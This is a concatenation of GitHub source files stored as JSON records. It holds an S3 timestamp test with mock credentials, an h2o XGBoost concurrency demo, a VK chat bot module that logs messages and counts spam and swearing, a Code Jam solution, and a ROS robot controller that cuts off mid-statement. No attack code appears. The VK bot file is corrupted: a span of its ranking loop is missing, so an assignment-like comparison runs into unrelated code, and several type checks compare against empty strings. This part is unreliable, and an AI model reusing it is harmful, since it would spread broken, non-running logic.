+{"seq_id":"75146955714","text":"import sys\nsys.path.append('./src/')\nimport json\nfrom ingestion.dates import retrieve_last_updated\nfrom ingestion.dates import store_last_updated\nfrom ingestion.utils import get_ingested_bucket_name\nfrom moto import mock_s3\nimport boto3\nfrom datetime import datetime\nimport pytest\nimport os\n\n\n# Mocking AWS credentials\n@pytest.fixture(scope='module')\ndef aws_credentials():\n '''Mocked AWS credentials for moto.'''\n\n os.environ['AWS_ACCESS_KEY_ID'] = 'test'\n os.environ['AWS_SECRET_ACCESS_KEY'] = 'test'\n os.environ['AWS_SECURITY_TOKEN'] = 'test'\n os.environ['AWS_SESSION_TOKEN'] = 'test'\n os.environ['AWS_DEFAULT_REGION'] = 'us-east-1'\n\n\n@pytest.fixture(scope='module')\ndef s3_s(aws_credentials):\n with mock_s3():\n yield boto3.client('s3')\n\n\n@pytest.fixture(scope='function')\ndef bucket(s3_s):\n s3_s.create_bucket(\n Bucket='s3-de-ingestion-query-queens-test-bucket'\n )\n\n\ndef test_store_last_updated_stores_last_updated(bucket, s3_s):\n date_string = \"2022-11-03T14:20:49.962000\"\n store_last_updated(date_string, date_string)\n response = s3_s.list_objects_v2(\n Bucket=get_ingested_bucket_name(),\n Prefix='date/'\n )\n list_of_files = [item['Key'] for item in response['Contents']]\n assert ['date/date.json', 'date/last_updated.json'] == list_of_files\n result = retrieve_last_updated()\n assert result == datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%S.%f')\n\n\ndef test_store_last_updated_copies_previous_update(bucket, s3_s):\n test_date = \"2000-11-03T14:20:49.962000\"\n store_last_updated(test_date, test_date)\n\n dt = \"2022-11-03T14:20:49.962000\"\n store_last_updated(dt, dt)\n\n response = s3_s.list_objects_v2(\n Bucket=get_ingested_bucket_name(),\n Prefix='date/'\n )\n list_of_files = [item['Key'] for item in response['Contents']]\n assert ['date/date.json', 'date/last_updated.json', 'date/temp_date.json'] == list_of_files\n result = retrieve_last_updated()\n assert result == datetime.strptime(dt, '%Y-%m-%dT%H:%M:%S.%f')\n\n res = s3_s.get_object(\n Bucket=get_ingested_bucket_name(),\n Key='date/temp_date.json'\n )\n json_res = json.loads(res['Body'].read())\n timestamp = json_res['last_updated']\n assert timestamp == \"2000-11-03T14:20:49.962000\"\n\n","repo_name":"rexhao362/de-jan-23-project","sub_path":"test/lambdas/ingestion/utils/test_store_last_updated.py","file_name":"test_store_last_updated.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13349828684","text":"import sys\nimport os\nimport csv\nsys.path.insert(1, \"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.xgboost import H2OXGBoostEstimator\n\n\n# this is more of a demo of how to use mojo_predict_csv to test prediction contributions concurrently\n# the dataset is likely too small to reliably catch problems (it might reveal something once in a while)\ndef demo_xgboost_concurrent_contributions():\n prostate_path = pyunit_utils.locate(\"smalldata/logreg/prostate.csv\")\n\n prostate = h2o.import_file(path=prostate_path)\n prostate[\"CAPSULE\"] = prostate[\"CAPSULE\"].asfactor()\n\n xgb_model = H2OXGBoostEstimator()\n xgb_model.train(x=[\"AGE\", \"RACE\", \"DPROS\", \"DCAPS\", \"PSA\", \"VOL\", \"GLEASON\"], y=\"CAPSULE\", training_frame=prostate)\n\n results_dir = os.path.join(pyunit_utils.locate(\"results\"), \"xgb_concurrent\")\n os.mkdir(results_dir)\n mojo_path = xgb_model.download_mojo(results_dir, get_genmodel_jar=True)\n\n # how 
many parallel threads to run\n concurrency = 4\n\n reference_result = h2o.mojo_predict_csv(input_csv_path=prostate_path, mojo_zip_path=mojo_path,\n output_csv_path=os.path.join(results_dir, \"predictions.csv\"),\n predict_contributions=True,\n extra_cmd_args=[\"--testConcurrent\", str(concurrency)])\n print(reference_result)\n\n for test_id in range(concurrency):\n with open(os.path.join(results_dir, \"predictions.csv.\" + str(test_id))) as csv_file:\n concurrent_result = list(csv.DictReader(csv_file))\n assert reference_result == concurrent_result\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(demo_xgboost_concurrent_contributions)\nelse:\n demo_xgboost_concurrent_contributions()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/xgboost/pyunit_mojo_concurrent_contribs_xgboost.py","file_name":"pyunit_mojo_concurrent_contribs_xgboost.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"4180533347","text":"import os.path\nfrom time import time\nfrom OpenFiles import OpenUserMessage, CloseUserMessage, OpenSwearList, CloseSwearList\nfrom SendMessage import SendMsgToChat\nfrom random import choice\n\ndef ReadAndAddMessageToFile(event, UserMessages, msg, ChatSet, session, vk_session):\n global PreviousTime, NowTime\n SpamUnDetected=True\n FilePath='/app/Data/UserMessages/User_'+str(event.obj.from_id)+'_in chat_'+str(event.chat_id)+'.txt'\n if os.path.isfile(FilePath) and (os.stat(FilePath).st_size!=0):\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'to read the user messages from an existing file', 'r')\n messages=int(UserMessageFile.readline().split()[1]) # messages=\n UserMessages={}\n for mess in range(messages):\n UserMessageFile.readline() # **********\n UserMessages[mess]={}\n UserMessages[mess]['time']=str(UserMessageFile.readline().split()[1])\n# print('from UsersMessages.py:\nUserMessages[{}][\"time\"]={}\n'.format(mess, UserMessages[mess]['time']))\n\n UserMessages[mess]['text']=str(' '.join(UserMessageFile.readline().split()[1:]))\n# print('from UsersMessages.py:\nUserMessages[{}][\"text\"]={}\n'.format(mess, UserMessages[mess]['text']))\n\n UserMessages[mess]['attachment']=int(UserMessageFile.readline().split()[1])\n# print('from UsersMessages.py:\nUserMessages[{}][\"attachment\"]={}\n'.format(mess, UserMessages[mess]['attachment']))\n\n if UserMessages[mess]['attachment']>0:\n tempatt=UserMessages[mess]['attachment']\n UserMessages[mess]['attachment']={}\n for att in range(tempatt):\n tempadress=UserMessageFile.readline().split()\n# print('from UsersMessages.py:\ntempadress={}\n'.format(tempadress))\n UserMessages[mess]['attachment'][tempadress[0]]=tempadress[1]\n# print('from UsersMessages.py:\nUserMessages[{}][\"attachment\"][{}]={}\n'.format(mess,tempadress[0],tempadress[1]))\n CloseUserMessage('after reading the user messages from an existing file', UserMessageFile)\n\n# print('UsersMessages numbers: {}\n'.format(UserMessages))\n\n TempMessage={}\n if len(UserMessages.keys())>149:\n UserMessages.pop(149)\n TextToFile='messages= '+str(len(UserMessages.keys())+1)+'\\n'\n# UserMessageFile.write(TextToFile)\n TextToFile=TextToFile+'******************************\\n'\n# UserMessageFile.write('******************************\\n')\n TempMessage['time']=str(time())\n TextToFile=TextToFile+'time: '+str(time())+'\\n'\n# TextToFile='time: '+str(time())+'\\n'\n# UserMessageFile.write(TextToFile)\n if msg!='':\n if 
len(msg)>ChatSet['parametrs']['max_message_len']:\n TempMessage['text']='\"Слишком большое, похожее на спам сообщение\"'\n TextToFile=TextToFile+'text: \"Слишком большое, похожее на спам сообщение\"\\n'\n# TextToFile='text: \"Слишком большое, похожее на спам сообщение\"\\n'\n# UserMessageFile.write(TextToFile)\n else:\n msg=msg.replace('\\n','/n')\n TempMessage['text']=msg\n TextToFile=TextToFile+'text: '+msg+'\\n'\n# TextToFile='text: '+msg+'\\n'\n# UserMessageFile.write(TextToFile)\n else:\n TempMessage['text']='/NONE/'\n TextToFile=TextToFile+'text: /NONE/\\n'\n# TextToFile='text: /NONE/\\n'\n# UserMessageFile.write(TextToFile)\n# print('\\nTextToFile0: \\n', TextToFile,'\\n')\n if str(event.object.attachments)!='[]':\n TempMessage['attachments']={}\n TextToFile=TextToFile+'attachments: '+str(len(event.object.attachments))+'\\n'\n# TextToFile='attachments: '+str(len(event.object.attachments))+'\\n'\n# UserMessageFile.write(TextToFile)\n for elem in event.object.attachments:\n if elem['type']=='photo':\n maxwidth=0\n maxheight=0\n for slice in elem['photo']['sizes']:\n if slice['width']>=maxwidth and slice['height']>=maxheight:\n maxwidth=slice['width']\n maxheight=slice['height']\n url=slice['url']\n TempMessage['attachments'][str(elem['type'])]=str(url)\n TextToFile=TextToFile+str(elem['type'])+' '+str(url)+'\\n'\n# TextToFile=str(elem['type'])+' '+str(url)+'\\n'\n# UserMessageFile.write(TextToFile)\n elif elem['type']=='video':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='audio':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='doc':\n# TextToFile=str(elem[elem['type']]['ext'])+' '+str(elem[elem['type']]['url'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem[elem['type']]['ext'])]=str(elem[elem['type']]['url'])\n TextToFile=TextToFile+str(elem[elem['type']]['ext'])+' '+str(elem[elem['type']]['url'])+'\\n'\n elif elem['type']=='wall':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='sticker':\n# TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['sticker_id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['sticker_id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['sticker_id'])+'\\n'\n elif elem['type']=='graffiti':\n# 
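(hypothetical editor note: the commented-out write below is one of the legacy per-attachment file writes, superseded by the accumulated TextToFile buffer that is written once after the file is reopened)\n#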
TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['url'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'_'+str(elem[elem['type']]['access_key'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'_'+str(elem[elem['type']]['access_key'])+'\\n'\n elif elem['type']=='audio_message':\n# TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['link_mp3'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['link_mp3'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['link_mp3'])+'\\n'\n elif elem['type']=='poll':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='link':\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['url'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['url'])+'\\n'\n else:\n# TextToFile='attachments: 0\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments']=0\n TextToFile=TextToFile+'attachments: 0\\n'\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для записи нового сообщения пользователя в уже существующий файл', 'w')\n# print('UsersMessages.py\\ntext:\\n{}\\n\\nTempMess:\\n{}\\n'.format(TextToFile, TempMessage))\n\n PreviousTime=0\n NowTime=0\n for elem in range(len(list(UserMessages[0]['time']))):\n if list(UserMessages[0]['time'])[elem]=='.':\n PreviousTime=int(''.join(list(UserMessages[0]['time'])[0:elem]))\n micro=int(''.join(list(UserMessages[0]['time'])[(elem+1):]))\n PreviousTime=PreviousTime+(micro/10**len(str(micro)))\n break\n for elem in range(len(list(TempMessage['time']))):\n if list(TempMessage['time'])[elem]=='.':\n NowTime=int(''.join(list(TempMessage['time'])[0:elem]))\n micro=int(''.join(list(TempMessage['time'])[(elem+1):]))\n NowTime=NowTime+(micro/10**len(str(micro)))\n break\n\n\n# print('\\nUsersMessages prev: \\n', UserMessages,'\\n')\n# print('\\nTempMessage итог: \\n', TempMessage,'\\n')\n# print('\\nNowTime-PreviousTime итог: \\n', NowTime-PreviousTime,'\\n')\n if TempMessage['attachments']!=0 and UserMessages[0]['attachment']!=0 and (TempMessage['attachments']==UserMessages[0]['attachment']):\n SpamUnDetected=False\n TextToFile='messages= '+str(len(UserMessages.keys()))+'\\n'\n# print('\\nTextToFile итог1: \\n', TextToFile,'\\n')\n UserMessageFile.write(TextToFile)\n elif (UserMessages[0]['text']==TempMessage['text'] and (UserMessages[0]['text']!='/NONE/' and TempMessage['text']!='/NONE/')) or (NowTime-PreviousTime)<1.0:\n TextToFile='messages= '+str(len(UserMessages.keys()))+'\\n'\n # print('\\nTextToFile итог2: \\n', TextToFile,'\\n')\n UserMessageFile.write(TextToFile)\n SpamUnDetected=False\n else:\n# print('\\nTextToFile итог3: \\n', TextToFile,'\\n')\n UserMessageFile.write(TextToFile)\n\n for mess in UserMessages.keys():\n UserMessageFile.write('******************************\\n')\n TextToFile='time: '+str(UserMessages[mess]['time'])+'\\n'\n UserMessageFile.write(TextToFile)\n 
TextToFile='text: '+str(UserMessages[mess]['text'])+'\\n'\n UserMessageFile.write(TextToFile)\n if UserMessages[mess]['attachment']==0:\n TextToFile='attachment: 0\\n'\n UserMessageFile.write(TextToFile)\n else:\n TextToFile='attachment: '+str(len(UserMessages[mess]['attachment']))+'\\n'\n UserMessageFile.write(TextToFile)\n for elem in UserMessages[mess]['attachment'].keys():\n TextToFile=str(elem)+' '+str(UserMessages[mess]['attachment'][elem])+' \\n'\n UserMessageFile.write(TextToFile)\n CloseUserMessage('после записи всех сообщений пользователя в уже существующий файл', UserMessageFile)\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для чтения сообщений пользователя из уже существующего файла', 'r')\n messages=int(UserMessageFile.readline().split()[1]) # messages=\n UserMessages={}\n for mess in range(messages):\n UserMessageFile.readline() # **********\n UserMessages[mess]={}\n UserMessages[mess]['time']=str(UserMessageFile.readline().split()[1])\n UserMessages[mess]['text']=str(' '.join(UserMessageFile.readline().split()[1:]))\n UserMessages[mess]['attachment']=int(UserMessageFile.readline().split()[1])\n if UserMessages[mess]['attachment']>0:\n tempatt=UserMessages[mess]['attachment']\n UserMessages[mess]['attachment']={}\n for att in range(tempatt):\n tempadress=UserMessageFile.readline().split()\n UserMessages[mess]['attachment'][tempadress[0]]=tempadress[1]\n CloseUserMessage('после чтения сообщений пользователя из уже существующего файла', UserMessageFile)\n else:\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для записи нового сообщения пользователя в новый файл', 'w')\n TextToFile='messages= 1\\n'\n UserMessageFile.write(TextToFile)\n UserMessageFile.write('******************************\\n')\n TextToFile='time: '+str(time())+'\\n'\n UserMessageFile.write(TextToFile)\n if msg!='':\n if len(msg)>=ChatSet['parametrs']['max_message_len']:\n TextToFile='text: \"Слишком большое, похожее на спам сообщение\"\\n'\n UserMessageFile.write(TextToFile)\n else:\n msg=msg.replace('\\n','/n')\n TextToFile='text: '+msg+'\\n'\n UserMessageFile.write(TextToFile)\n else:\n TextToFile='text: /NONE/\\n'\n UserMessageFile.write(TextToFile)\n if str(event.object.attachments)!='[]':\n TextToFile='attachments: '+str(len(event.object.attachments))+'\\n'\n UserMessageFile.write(TextToFile)\n for elem in event.object.attachments:\n if elem['type']=='photo':\n maxwidth=0\n maxheight=0\n for slice in elem['photo']['sizes']:\n if slice['width']>=maxwidth and slice['height']>=maxheight:\n maxwidth=slice['width']\n maxheight=slice['height']\n url=slice['url']\n TextToFile=str(elem['type'])+' '+str(url)+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='video':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='audio':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='doc':\n TextToFile=str(elem[elem['type']]['ext'])+' '+str(elem[elem['type']]['url'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='wall':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='sticker':\n TextToFile=str(elem['type'])+' 
'+str(elem[elem['type']]['sticker_id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='graffiti':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'_'+str(elem[elem['type']]['access_key'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='audio_message':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['link_mp3'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='poll':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='link':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['url'])+'\\n'\n UserMessageFile.write(TextToFile)\n else:\n TextToFile='attachments: 0\\n'\n UserMessageFile.write(TextToFile)\n CloseUserMessage('после записи первого пользователя в новый файл', UserMessageFile)\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для чтения сообщений пользователя из уже существующего файла', 'r')\n messages=int(UserMessageFile.readline().split()[1]) # messages=\n UserMessages={}\n for mess in range(messages):\n UserMessageFile.readline() # **********\n UserMessages[mess]={}\n UserMessages[mess]['time']=str(UserMessageFile.readline().split()[1])\n UserMessages[mess]['text']=str(' '.join(UserMessageFile.readline().split()[1:]))\n UserMessages[mess]['attachment']=int(UserMessageFile.readline().split()[1])\n if UserMessages[mess]['attachment']>0:\n tempatt=UserMessages[mess]['attachment']\n UserMessages[mess]['attachment']={}\n for att in range(tempatt):\n tempadress=UserMessageFile.readline().split()\n UserMessages[mess]['attachment'][tempadress[0]]=tempadress[1]\n CloseUserMessage('после чтения сообщений пользователя из уже существующего файла', UserMessageFile)\n# print('usermessages\\nSpamUnDetected: {}\\n'.format(SpamUnDetected))\n return UserMessages, SpamUnDetected\n\n\n\n\n\n\n\ndef counter(event, UserStats, UserMessages, vk, Check, msg, BotName, ChatSet):\n global PreviousTime, NowTime\n# print('counter\\nPreviousTime: {}\\nNowTime: {}\\n'.format(PreviousTime,NowTime))\n SpamReact={3:'Ты же вкурсе, что спам - это плохо?',5:'Че спамишь то? 
Делать нефиг?',6:'Еще раз: хватит спамить!',7:'Я за спам, если что баню))',8:'Ты в бан хочешь?',9:'Ну я тебе предупреждал...'}\n    if Check==True and UserStats[event.obj.from_id]['BlackList']==0 and (not msg.startswith(BotName)) and (not msg.startswith('Бот')):\n        if UserStats[event.obj.from_id]['SpamTotal']!=0:\n            UserStats[event.obj.from_id]['SpamTotal']-=1\n        SwearList=OpenSwearList('для проверки наличия мата в сообщении')\n        Swear=SwearList.read().split()\n        CloseSwearList('после считывания списка матов',SwearList)\n        SC=False\n        for word in UserMessages[0]['text'].lower().split():\n            if word in Swear:\n                UserStats[event.obj.from_id]['SwearTotal']+=1\n#                text='Я считаю, что \"'+word+'\" является матом!!!!'\n#                SendMsgToChat(event, text, vk)\n                if ChatSet['parametrs']['swear_answer']=='True':\n                    SC=True\n        if SC==True:\n            text=choice(['Ты же вкурсе, что маты - это плохо?','Давайте общаться без мата!','Не матерись!','Фу, как не культурно!'])\n            SendMsgToChat(event, text, vk)\n        CloseSwearList('После проверки на наличие матов в сообщении', SwearList)\n        UserStats[event.obj.from_id]['MessageTotal']+=1\n        UserStats[event.obj.from_id]['WordsTotal']+=len(msg.split())\n        UserStats[event.obj.from_id]['LetterTotal']+=len(list(msg))\n        UserStats[event.obj.from_id]['LastActiveTime']=time()\n    Top={}\n    for man in UserStats.keys():\n        UserStats[man]['Status']=''\n    ############################################################ ТОП ПО МАТАМ\n    i=0\n    for human in UserStats.keys():\n        Top[i]=[human,UserStats[human]['SwearTotal']]\n        i+=1\n    i=0\n    while True:\n        if int(Top[i][1])=100:\n            Middle=LettersTotal/TotalMessage\n            if len(list(msg))>=Middle and (NowTime-PreviousTime)<25.0:\n                UserStats[event.obj.from_id]['TypingTime']=NowTime-PreviousTime\n    if str(event.object.attachments)!='[]':\n        for elem in event.object.attachments:\n            if elem['type']=='photo':\n                UserStats[event.obj.from_id]['Photos']+=1\n            elif elem['type']=='video':\n                UserStats[event.obj.from_id]['Videos']+=1\n            elif elem['type']=='sticker':\n                UserStats[event.obj.from_id]['StickersTotal']+=1\n            elif elem['type']=='audio':\n                UserStats[event.obj.from_id]['Audios']+=1\n            elif elem['type']=='graffiti':\n                UserStats[event.obj.from_id]['Graffity']+=1\n            elif elem['type']=='audio_message':\n                UserStats[event.obj.from_id]['Speech']+=1\n            elif elem['type']=='poll':\n                UserStats[event.obj.from_id]['Poll']+=1\n            elif elem['type']=='doc':\n                if elem[elem['type']]['ext']=='gif':\n                    UserStats[event.obj.from_id]['Gifs']+=1\n                elif elem[elem['type']]['ext']=='png' or elem[elem['type']]['ext']=='jpg' or elem[elem['type']]['ext']=='bmp':\n                    UserStats[event.obj.from_id]['Photos']+=1\n    if str(type(UserStats[event.obj.from_id]['Privilege']))==\"\" and 4>UserStats[event.obj.from_id]['Privilege']>-1 and UserStats[event.obj.from_id]['BlackList']==0 and Check==False and UserStats[event.obj.from_id]['Privilege']<1:\n        if UserStats[event.obj.from_id]['SpamTotal']==3 or UserStats[event.obj.from_id]['SpamTotal']>=5:\n            SendMsgToChat(event, SpamReact[UserStats[event.obj.from_id]['SpamTotal']], vk)\n        UserStats[event.obj.from_id]['SpamTotal']+=1\n#        print('Counter Spam: ', UserStats[event.obj.from_id]['SpamTotal'],'\\n')\n        if UserStats[event.obj.from_id]['SpamTotal']==10:\n            UserStats[event.obj.from_id]['BlackList']=1\n            UserStats[event.obj.from_id]['SpamTotal']=0\n    elif str(type(UserStats[event.obj.from_id]['Privilege']))==\"\" and ChatSet['classes'][UserStats[event.obj.from_id]['Privilege']]['Can_spam']==False and Check==False and UserStats[event.obj.from_id]['BlackList']==0:\n        if 
UserStats[event.obj.from_id]['SpamTotal']==3 or UserStats[event.obj.from_id]['SpamTotal']>=5:\n SendMsgToChat(event, SpamReact[UserStats[event.obj.from_id]['SpamTotal']], vk)\n UserStats[event.obj.from_id]['SpamTotal']+=1\n# print('Counter Spam: ', UserStats[event.obj.from_id]['SpamTotal'],'\\n')\n if UserStats[event.obj.from_id]['SpamTotal']==10:\n UserStats[event.obj.from_id]['BlackList']=1\n UserStats[event.obj.from_id]['SpamTotal']=0\n\n# print('counter проверка 2\\n')\n return UserStats\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"1nfome/VKChatBot","sub_path":"Code/UsersMessages.py","file_name":"UsersMessages.py","file_ext":"py","file_size_in_byte":27312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23578392341","text":"fileName = \"A-large.in\"\nf = open(fileName, 'r')\n\noutputName = \"A-large-out.txt\"\noutput = open(outputName, 'w')\n\nline = f.readline()\nT = int(line)\n\nfor t in range(T):\n res = \"\"\n line = f.readline()\n line = line.split()\n D = int(line[0])\n D = D * 1.0\n N = int(line[1])\n horses = []\n\n for i in range(N):\n line = f.readline()\n line = line.split()\n K = int(line[0])\n S = int(line[1])\n horses.append([K, S])\n \n horses.sort(key=lambda x: x[0], reverse = True)\n \n for i in range(1, N):\n speed = horses[i-1][1] * 1.0\n position = horses[i-1][0] * 1.0\n time = (D - position)/speed\n \n speed2 = horses[i][1] * 1.0\n position2 = horses[i][0] * 1.0\n time2 = (D - position2)/speed2\n \n if time2 < time:\n newSpeed = (D - position2) / time\n horses[i][1] = newSpeed\n \n speed = horses[N-1][1] * 1.0\n position = horses[N-1][0] * 1.0\n time = (D - position)/speed\n \n finalSpeed = D / time\n res = \"{0:.8f}\".format(finalSpeed)\n \n print(\"Case #{}: {}\".format(t+1, res))\n output.write(\"Case #{}: {}\".format(t+1, res))\n output.write(\"\\n\")\n \noutput.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/1201.py","file_name":"1201.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11704191531","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport math\nimport rospy\nimport tf\n\nfrom PyKDL import ( # pylint: disable=no-name-in-module\n Chain,\n Frame,\n Vector,\n Rotation,\n Segment,\n JntArray,\n Joint,\n ChainFkSolverPos_recursive,\n ChainIkSolverVel_pinv,\n ChainIkSolverPos_NR,\n)\n\n# from time import sleep\nfrom std_msgs.msg import Bool, String, Float32MultiArray\nfrom sensor_msgs.msg import JointState\nfrom actionlib_msgs.msg import GoalStatusArray\nfrom tf2_msgs.msg import TFMessage\n\n\n################ joint test list ####################\n\n# examples of teaching points\nq = [0, 0, 0, 0, 0, 0]\nhome = [0, 0, -90, 0, -90, 0]\nway_home = [8, -17, -86, 0, -77, 7]\np1_up = [10, -32, -88, 0, -60, 10]\np1_down = [10, -36, -92, 0, -52, 10]\np2_up = [0, -37, -76, 0, -67, 0]\np2_down = [0, -42, -82, 0, -57, 0]\np3_up = [2, -50, -53, 0, -78, 2]\np3_down = [2, -53, -58, 0, -70, 2]\np4_up = [11, -45, -63, 0, -73, 11]\np4_down = [11, -48, -68, 0, -65, 11]\nway_home2 = [11, -24, -82, -1, -74, 11]\n# chain_test = [0, 90, 0, 0, -90, 0]\n\nway_point = [\n home,\n way_home,\n p1_up,\n p1_down,\n p1_up,\n p2_up,\n p2_down,\n p2_up,\n p3_up,\n p3_down,\n p3_up,\n p4_up,\n p4_down,\n p4_up,\n way_home,\n home,\n]\n\n################ joint test list end ################\n\n\ndef rads2degs(rad_list):\n degs = [math.degrees(rad) for rad in 
rad_list]\n return degs\n\n\ndef degs2rads(deg_list):\n rads = [math.radians(deg) for deg in deg_list]\n return rads\n\n\nclass TaskControllerApp:\n \"\"\"Joint Controller\n\n Args:\n self.isstatus : check robot status\n self.listener : get tf(robot) info /link0 to /link6\n self.isshutdown : program termination param\n\n self.chain : define robot link(chain) from tf listener -> to calc kinematics(fk/ik)\n self.jointAngles : get current joint value of robot\n\n self.trans : vector value to build chain\n self.rot : ratation value to build chain\n\n \"\"\"\n\n def __init__(self):\n rospy.init_node(\"task_controller_indy\")\n\n self.ready = 0\n self.READY_STATE = 101\n self.BUSY_STATE = 202\n self.MOVING = 303\n self.ERROR = 404\n\n # publisher\n self.stop_pub = rospy.Publisher(\"/stop_motion\", Bool, queue_size=1)\n self.jnt_pub = rospy.Publisher(\"joint_val\", Float32MultiArray, queue_size=1)\n self.node_shutdown_pub = rospy.Publisher(\"/shutdown_msg\", Bool, queue_size=1)\n\n # subscriber\n self.indy_status_check_sub = rospy.Subscriber(\n \"/indy/status\", GoalStatusArray, self.status_callback\n )\n self.indy_joint_sub = rospy.Subscriber(\n \"/joint_states\", JointState, self.joint_callback\n )\n self.cmd_msg_sub = rospy.Subscriber(\"/cmd_msg\", String, self.msg_callback)\n # self.frame_sub = rospy.Subscriber(\"/way_point_msg\", Frame, self.get_point_cb)\n\n self.isstatus = GoalStatusArray()\n self.robot_tf = TFMessage()\n self.listener = tf.TransformListener()\n self.indy_jnt = JointState()\n self.isshutdown = False\n\n self.chain = Chain()\n self.jointAngles = JntArray(6)\n self.q_list = Float32MultiArray()\n\n self.q_list.data = [0 for l in range(6)]\n self.trans = [0 for i in range(6)]\n self.rot = [0 for j in range(6)]\n\n self.go_sign = \"1\"\n\n while True:\n try:\n (self.trans[0], self.rot[0]) = self.listener.lookupTransform(\n \"/link1\", \"/link2\", rospy.Time(0)\n )\n (self.trans[1], self.rot[1]) = self.listener.lookupTransform(\n \"/link2\", \"/link3\", rospy.Time(0)\n )\n (self.trans[2], self.rot[2]) = self.listener.lookupTransform(\n \"/link3\", \"/link4\", rospy.Time(0)\n )\n (self.trans[3], self.rot[3]) = self.listener.lookupTransform(\n 